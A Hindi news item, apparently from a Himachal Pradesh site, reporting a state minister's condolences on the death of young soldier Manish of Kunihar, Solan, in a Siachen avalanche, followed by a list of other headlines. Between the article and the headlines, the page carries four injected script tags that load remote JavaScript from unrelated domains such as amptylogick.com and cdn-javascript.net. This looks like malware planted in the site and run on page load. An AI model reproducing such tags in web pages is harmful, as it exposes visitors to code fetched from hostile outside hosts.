<p>सामाजिक न्याय एवं अधिकारिता और सहकारिता मंत्री डॉ. राजीव सैजल ने सोलन जिला के कुनिहार निवासी सैनिक मनीष की शहादत पर गहरा दुःख व्यक्त किया है। 22 साल के सैनिक मनीष भारतीय सेना की डोगरा रेजीमेंट में तैनात थे और सोमवार को सियाचिन में उत्तरी ग्लेशियर के समीप गश्त के समय हिमस्खलन की चपेट में आ गए थे। मनीष सोलन जिला के विकास खंड कुनिहार के गांव दोची के रहने वाले थे।</p>
<p>डॉ. सैजल ने कहा कि हिमाचल के वीर सपूतों ने भारतीय सेना तथा अर्धसैनिक बलों के माध्यम से सदैव देश की सेवा और सीमा की रक्षा के लिए अपने प्राणों का बलिदान दिया है। सैनिक मनीष की शहादत व्यर्थ नहीं जाएगी और उनके बलिदान को सदैव याद रखा जाएगा। उन्होंने परमपिता परमात्मा से दिवंगत आत्मा की शांति और शोक संतप्त परिजनों को इस असहनीय दुःख को सहन करने की शक्ति प्रदान करने की प्रार्थना की है। जिला प्रशासन से प्राप्त जानकारी के अनुसार शहीद की पार्थिव देह कल तक चंडीगढ़ पहुंचने की संभावना है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1574157819874″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
हिमाचल प्रदेश के चंबा जिले के मतियारा गांव में शादी का माहौल उस समय मातम…
Satoun School hockey achievement : सतोन पी एम श्री राजकीय वरिष्ठ माध्यमिक पाठशाला की छात्राओं…
Samarth campaign disaster preparedness: हिमाचल प्रदेश के आपदा प्रबंधन विभाग द्वारा आपदा से निपटने के…
Rainfall Deficit 2024: मानसून की विदाई के बाद हिमाचल प्रदेश में अक्टूबर के पहले 13…
Water Guards Promotion 2024: जलशक्ति विभाग में 12 साल का सेवाकाल पूरा कर चुके 184…
Mumbai: महाराष्ट्र के पूर्व मंत्री और राष्ट्रवादी कांग्रेस पार्टी (राकांपा) नेता बाबा सिद्दीकी की हत्या…